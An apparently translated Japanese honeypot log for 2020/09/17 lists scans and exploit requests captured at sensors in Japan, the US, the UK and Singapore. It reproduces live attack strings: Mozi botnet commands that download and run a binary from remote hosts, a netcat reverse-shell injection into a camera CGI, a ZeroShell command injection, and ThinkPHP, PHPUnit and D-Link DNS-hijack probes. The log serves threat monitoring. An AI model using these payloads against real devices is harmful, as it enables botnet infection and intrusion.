コンニチハレバレトシタアオゾラ

With nothing better to do, I sit at my blog all day and aimlessly write down whatever trivial thoughts drift through my mind...

2020/09/17 Honeypot (tentative) observation log

This is the honeypot (tentative) observation log for 2020/09/17.

Features
Location:JP

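The following were observed:

Requests targeting the GoAhead IP camera vulnerability
Requests targeting the GPON router vulnerability
Requests targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Requests targeting vulnerabilities in NetGear products
Requests targeting the ThinkPHP vulnerability
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Requests with the User-Agent "Hello, world"
Gh0stRAT-like behavior

The following request to /shell was observed: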

cd /tmp;
rm -rf *;
wget http[:]//115[.]98[.]144[.]77:57903/Mozi.a;
chmod 777 Mozi.a;
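/tmp/Mozi.a jaws

Location:US

The following were observed:

Requests targeting the GPON router vulnerability (CVE-2018-10561)
Requests targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Requests targeting vulnerabilities in NetGear products
Requests targeting the PHPUnit vulnerability (CVE-2017-9841)
Requests targeting the ThinkPHP vulnerability
Requests targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
Requests attempting DNS hijacking against D-Link products
Scanning by zgrab
Scanning by ZmEu
Scanning for Apache Solr
Scanning for phpMyAdmin
Requests with the User-Agent "Hello, World"
Requests with the User-Agent "Hello, world"

The following requests to /shell were observed: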

cd /tmp;
rm -rf *;
wget http[:]//115[.]98[.]181[.]69:39300/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//115[.]99[.]12[.]120:47894/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//27[.]6[.]13[.]218:54465/Mozi.a;
chmod 777 Mozi.a;
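/tmp/Mozi.a jaws

Location:UK

The following were observed:

Requests targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Requests targeting vulnerabilities in NetGear products
Requests targeting the ThinkPHP vulnerability
Scanning by zgrab
Scanning for Apache Solr
Requests with the User-Agent "Hello, world"

The following request to /shell was observed: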

cd /tmp;
rm -rf *;
wget http[:]//116[.]72[.]83[.]20:59457/Mozi.a;
chmod 777 Mozi.a;
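/tmp/Mozi.a jaws

Location:SG

The following were observed:

Requests targeting vulnerabilities in DrayTek products
Requests targeting the GPON router vulnerability
Requests targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Requests targeting the ThinkPHP vulnerability
Scanning by XTC
Scanning by XTC BOTNET
Scanning by zgrab
Scanning for Apache Solr
Requests with the User-Agent "Hello, world"

The following request to /shell was observed: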

cd /tmp;
rm -rf *;
wget http[:]//27[.]5[.]43[.]20:35330/Mozi.a;
chmod 777 Mozi.a;
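/tmp/Mozi.a jaws

Request count trend

JP: total requests: 23 (change from previous day: -6)
US: total requests: 365 (change from previous day: +213)
UK: total requests: 17 (change from previous day: -126)
SG: total requests: 227 (change from previous day: +71)

For convenience, GET / HTTP/1.1 and POST / HTTP/1.1 are excluded.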

Location:JP

Source IP addresses

User-Agents

Count User-Agent
10 -
1 Hello, world
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
5 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1 Mozilla/5.0 zgrab/0.x

Requests

Count Method Request Protocol
1 Gh0st\xad
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /Public/home/appjs/Index.js HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /favicon.ico HTTP/1.1
1 GET /ftptest.cgi?loginuse=&loginpas= HTTP/1.1\n
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fsh%29 HTTP/1.1\n
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]97[.]111[.]58:57784/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]144[.]77:57903/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET login.cgi HTTP/1.1
2 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1

Location:US

Source IP addresses

User-Agents

Count User-Agent
320 -
1 Hello, World
3 Hello, world
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 zgrab/0.x
26 ZmEu
1 curl/7.58.0
1 gSOAP/2.8

Requests

Count Method Request Protocol
1 %00 %00 %00/%00
2 ABCD / HTTP/1.1
1 ABCD ABCD HTTP/1.1
3 ABCD HTTP/1.1
1 BDMT /index.html HTTP/6.7
2 CONNECT HTTP/1.1
1 GET /../../../../../../../../../../../ HTTP/1.1
1 GET /../../..//index.html HTTP/1.0
1 GET /..//index.html HTTP/1.1
1 GET /../index.html
1 GET /../index.html HTTP/1.1
1 GET /../index.html HTTP/6.7
1 GET /../index.html HTTP/1.0
1 GET /.env HTTP/1.1
1 GET /////index.html HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /BlackCatCMS/ HTTP/1.1
1 GET /Collabtive/ HTTP/1.1
1 GET /Concrete5/ HTTP/1.1
1 GET /CubeCart/ HTTP/1.1
1 GET /DokuWiki/ HTTP/1.1
1 GET /GLPI/ HTTP/1.1
1 GET /HumHub/ HTTP/1.1
1 GET /Joomla/ HTTP/1.1
1 GET /MODX/ HTTP/1.1
1 GET /MODx/ HTTP/1.1
1 GET /Magento/ HTTP/1.1
2 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /OpenDocMan/ HTTP/1.1
1 GET /PHPMYADMIN/scripts/setup.php HTTP/1.1
1 GET /PivotX/ HTTP/1.1
1 GET /PrestaShop/ HTTP/1.1
1 GET /PyroCMS/ HTTP/1.1
1 GET /ResourceSpace/ HTTP/1.1
1 GET /Serendipity/ HTTP/1.1
1 GET /SugarCE/ HTTP/1.1
1 GET /TestLink/ HTTP/1.1
1 GET /WebCalendar/ HTTP/1.1
1 GET /\./index.html HTTP/6.7
1 GET /\./index.html
2 GET /\./index.html HTTP/1.1
1 GET /_vti_bin/ HTTP/1.1
1 GET /_vti_cnf/ HTTP/1.1
1 GET /_vti_log/ HTTP/1.1
1 GET /_vti_pvt/ HTTP/1.1
1 GET /achievo/ HTTP/1.1
1 GET /adaptcms/ HTTP/1.1
1 GET /ajaxplorer/ HTTP/1.1
1 GET /appRain/ HTTP/1.1
1 GET /apprain/ HTTP/1.1
1 GET /asp/ HTTP/1.1
1 GET /assets/ HTTP/1.1
1 GET /assets/images/ HTTP/1.1
1 GET /b2evolution/ HTTP/1.1
1 GET /bad397 HTTP/1.1
1 GET /bad397/ HTTP/1.1
1 GET /blackcatcms/ HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /cart/ HTTP/1.1
1 GET /cerb/ HTTP/1.1
1 GET /cgi-bin-sdb/ HTTP/1.1
1 GET /cgi-bin/ HTTP/1.1
12 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /cgi/ HTTP/1.1
1 GET /cgi_bin/ HTTP/1.1
1 GET /cms/ HTTP/1.1
1 GET /codoforum/ HTTP/1.1
1 GET /collab/ HTTP/1.1
1 GET /collaborate/ HTTP/1.1
1 GET /collabtive/ HTTP/1.1
1 GET /common/ HTTP/1.1
1 GET /community/ HTTP/1.1
1 GET /concrete5/ HTTP/1.1
1 GET /confluence/ HTTP/1.1
1 GET /cubecart/ HTTP/1.1
1 GET /dapewfnsw1_dyl/ HTTP/1.1
1 GET /database/scripts/setup.php HTTP/1.1
1 GET /db/scripts/setup.php HTTP/1.1
1 GET /dbadmin/scripts/setup.php HTTP/1.1
1 GET /dnscfg.cgi?dnsPrimary=149.56.152.185&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1 HTTP/1.1
1 GET /doc/ HTTP/1.1
1 GET /doc/packages/ HTTP/1.1
1 GET /dokuwiki/ HTTP/1.1
1 GET /dolibarr/ HTTP/1.1
1 GET /doorgets/ HTTP/1.1
1 GET /drupal/ HTTP/1.1
1 GET /e107/ HTTP/1.1
1 GET /eFront/ HTTP/1.1
1 GET /efront/ HTTP/1.1
1 GET /f5sqosds8e5h1/ HTTP/1.1
1 GET /false_37207 HTTP/1.1
1 GET /false_37207/ HTTP/1.1
1 GET /fastcgi/ HTTP/1.1
1 GET /flyspray/ HTTP/1.1
1 GET /forum/ HTTP/1.1
1 GET /glpi/ HTTP/1.1
1 GET /guia-negocios/ HTTP/1.1
1 GET /helpdezk-community/ HTTP/1.1
1 GET /helpdezk/ HTTP/1.1
1 GET /hrm/ HTTP/1.1
1 GET /html/ HTTP/1.1
1 GET /humhub/ HTTP/1.1
1 GET /icehrm/ HTTP/1.1
1 GET /images/ HTTP/1.1
1 GET /img/ HTTP/1.1
3 GET /index.html
17 GET /index.html HTTP/1.1
2 GET /index.html HTTP/6.7
1 GET /index.html HTTP/0.9
1 GET /index.html QUALYS/1.1
1 GET /index.html HTTP/rndmmtd
1 GET /index.html HTTP/1.1rndmmtd
1 GET /index.html HTTP/6.7rndmmtd
1 GET /index.html HTTP/0.0
4 GET /index.html HTTP/1.0
1 GET /index.html HTTP/QUALYS
2 GET /index.html HTTP/1.2
3 GET /index.html rndmmtd
1 GET /index.html.......... HTTP/6.7
1 GET /index.html.............. HTTP/1.1
1 GET /index.html?advbjhvyivov HTTP/1.1
1 GET /index.html?rndmmtd HTTP/1.1
1 GET /index.html?test HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
2 GET /ivwgzvlg0a/ HTTP/1.1
1 GET /j67ud1ohxh591/ HTTP/1.1
1 GET /jbyi_0_3_/ HTTP/1.1
1 GET /jh_kowsx9x9b/ HTTP/1.1
1 GET /joomla/ HTTP/1.1
1 GET /khu2f8afsrj/ HTTP/1.1
1 GET /liferay/ HTTP/1.1
1 GET /login/ HTTP/1.1
1 GET /magento/ HTTP/1.1
1 GET /mail/ HTTP/1.1
1 GET /manager/ HTTP/1.1
1 GET /manual/ HTTP/1.1
1 GET /manual/images/ HTTP/1.1
1 GET /mediawiki/ HTTP/1.1
1 GET /microweber/ HTTP/1.1
1 GET /modx/ HTTP/1.1
1 GET /moodle/ HTTP/1.1
1 GET /movabletype/ HTTP/1.1
4 GET /mujxpf9qfrie2i5mddq HTTP/1.1
1 GET /mujxpf9qfrie2i5mddq HTTP/6.7
1 GET /mujxpf9qfrie2i5mddq HTTP/1.0
1 GET /mujxpf9qfrie2i5mddq
1 GET /mujxpf9qfrie2i5mddq/../index.html HTTP/1.1
1 GET /my/scripts/setup.php HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /mybb/ HTTP/1.1
1 GET /mysql/scripts/setup.php HTTP/1.1
1 GET /mysqladmin/scripts/setup.php HTTP/1.1
2 GET /nbr032b_j_l/ HTTP/1.1
1 GET /news/ HTTP/1.1
1 GET /ob3w_m87j/ HTTP/1.1
1 GET /odm/ HTTP/1.1
1 GET /ok09pi4y4so/ HTTP/1.1
1 GET /ooiqow30sq8m/ HTTP/1.1
1 GET /opendocman/ HTTP/1.1
1 GET /opensourcepos/ HTTP/1.1
1 GET /ownCloud/ HTTP/1.1
1 GET /owncloud/ HTTP/1.1
1 GET /pHpMyAdMiN/scripts/setup.php HTTP/1.1
1 GET /perl/ HTTP/1.1
1 GET /php/ HTTP/1.1
1 GET /phpAdmin/scripts/setup.php HTTP/1.1
1 GET /phpBB/ HTTP/1.1
1 GET /phpBB3/ HTTP/1.1
1 GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin/ HTTP/1.1
1 GET /phpMyAdmin/scripts/db.init.php HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpadmin/scripts/setup.php HTTP/1.1
1 GET /phpbb/ HTTP/1.1
1 GET /phpbb3/ HTTP/1.1
1 GET /phpgb/ HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/scripts/db.init.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin1/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin2/scripts/setup.php HTTP/1.1
1 GET /phpnuke/ HTTP/1.1
1 GET /phpwcms/ HTTP/1.1
1 GET /pivotx/ HTTP/1.1
1 GET /pligg-cms/ HTTP/1.1
1 GET /pligg/ HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /postnuke/ HTTP/1.1
1 GET /prestashop/ HTTP/1.1
1 GET /project/ HTTP/1.1
1 GET /projekt/ HTTP/1.1
1 GET /pub/ HTTP/1.1
1 GET /pydio/ HTTP/1.1
1 GET /pyrocms/ HTTP/1.1
1 GET /q9kn5dunk/ HTTP/1.1
1 GET /r7ioc58x5gilw/ HTTP/1.1
1 GET /recipe/ HTTP/1.1
1 GET /recipe/assets/ HTTP/1.1
1 GET /recipe/recipe/ HTTP/1.1
1 GET /redaxscript/ HTTP/1.1
2 GET /rendkaejhlckn8/ HTTP/1.1
1 GET /resourcespace/ HTTP/1.1
2 GET /rnvtolo9pm/ HTTP/1.1
1 GET /samples/ HTTP/1.1
1 GET /scripts/ HTTP/1.1
1 GET /scripts/setup.php HTTP/1.1
1 GET /serendipity/ HTTP/1.1
1 GET /servlet/ HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /setup.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]181[.]69:39300/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]99[.]12[.]120:47894/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]6[.]13[.]218:54465/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /snzbcxfdhdk/ HTTP/1.1
1 GET /social/ HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /spip/ HTTP/1.1
1 GET /sqladm/scripts/setup.php HTTP/1.1
1 GET /sqladmin/scripts/setup.php HTTP/1.1
1 GET /storage/ HTTP/1.1
1 GET /sugarce/ HTTP/1.1
1 GET /sugarcrm/ HTTP/1.1
1 GET /test/ HTTP/1.1
1 GET /testlink/ HTTP/1.1
1 GET /tikiwiki/ HTTP/1.1
1 GET /tv9h3z4t9d/ HTTP/1.1
1 GET /twiki/ HTTP/1.1
1 GET /typo3/ HTTP/1.1
1 GET /typo3/typo3/ HTTP/1.1
1 GET /ugi7s50u/ HTTP/1.1
1 GET /usemod/ HTTP/1.1
1 GET /usr/doc/ HTTP/1.1
1 GET /vTigerCRM/ HTTP/1.1
1 GET /vcms/ HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vncviewer.jar HTTP/1.1
1 GET /vohthw32/ HTTP/1.1
1 GET /vtigercrm/ HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
1 GET /wacko/ HTTP/1.1
1 GET /wbce/ HTTP/1.1
1 GET /webcalendar/ HTTP/1.1
1 GET /webmail/ HTTP/1.1
1 GET /wiki/ HTTP/1.1
1 GET /wikka/ HTTP/1.1
1 GET /wolfcms/ HTTP/1.1
1 GET /wordpress/ HTTP/1.1
1 GET /wordpress/wp-content/plugins/ HTTP/1.1
1 GET /wp-content/plugins/ HTTP/1.1
1 GET /wp/ HTTP/1.1
2 GET /wrgeu5ecd13va/ HTTP/1.1
1 GET /xoops/ HTTP/1.1
1 GET /ytnzrxp5b/ HTTP/1.1
1 GET /yuy24k3/ HTTP/1.1
1 GET /z1c6we9/ HTTP/1.1
2 GET /z3n7m2s98gtx1x/ HTTP/1.1
1 GET /zen-cart/ HTTP/1.1
1 GET /zencart/ HTTP/1.1
2 GET HTTP/1.1
2 GET http://83[.]118[.]68[.]34.bc.googleusercontent.com:80/index.html HTTP/1.1
1 GET http[:]//Qualys[.]null/ HTTP/1.0
1 GET/index.html HTTP/1.1
1 GET/mujxpf9qfrie2i5mddq HTTP/1.1
1 HEA /index.html HTTP/1.1
1 HEAD / HTTP/1.0
2 HEAD /index.html HTTP/1.1
2 HEAD /index.html HTTP/1.0
1 HEAD /index.html
1 HEAD /index.html HTTP/0.9
1 HEAD /mujxpf9qfrie2i5mddq HTTP/1.1
1 HEAD /mujxpf9qfrie2i5mddq HTTP/2.0
1 HEAD /selfupdate/wuident.cab HTTP/1.0
1 If-Match: *
1 OPTIONS / HTTP/1.1
1 OPTIONS / HTTP/1.0
2 OPTIONS /index.html HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
3 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
1 POST /index.html HTTP/1.0
1 POST /index.html QUALYS/1.1
2 POST /index.html HTTP/1.1
1 POST /mujxpf9qfrie2i5mddq HTTP/1.1
1 POST /mujxpf9qfrie2i5mddq?rndmmtd HTTP/1.1
1 POST /sdk/vimService HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PROPFIND / HTTP/1.1
2 QUALYS / HTTP/1.1
1 RNDMMTD /index.html HTTP/1.0
1 SEARCH / HTTP/1.1
1 TRACE / HTTP/1.1
2 get /index.html HTTP/1.1
2 get /index.html HTTP/1.0
1 rndmmtd / HTTP/1.1
1 rndmmtd /index.html HTTP/1.0
1 rndmmtd /index.html HTTP/1.1
1 rndmmtd /mujxpf9qfrie2i5mddq HTTP/1.0

Location:UK

Source IP addresses

User-Agents

Count User-Agent
5 -
1 Hello, world
8 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 zgrab/0.x

Requests

Count Method Request Protocol
1 -
1 GET /.env HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /c/ HTTP/1.1
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]75[.]107[.]251:60565/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//116[.]72[.]83[.]20:59457/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
2 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1

Location:SG

Source IP addresses

User-Agents

Count User-Agent
9 -
1 Hello, world
202 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 zgrab/0.x
1 XTC
1 XTC BOTNET

Requests

Count Method Request Protocol
2 -
2 \x03
2 \x16\x03\x01
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /c/ HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1
202 GET /phpmyadmin/ HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]5[.]43[.]20:35330/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET http[:]//httpheader[.]net/azenv.php HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 OPTIONS * HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /api/jsonws/invoke HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cgi-bin/mainfunction.cgi HTTP/1.1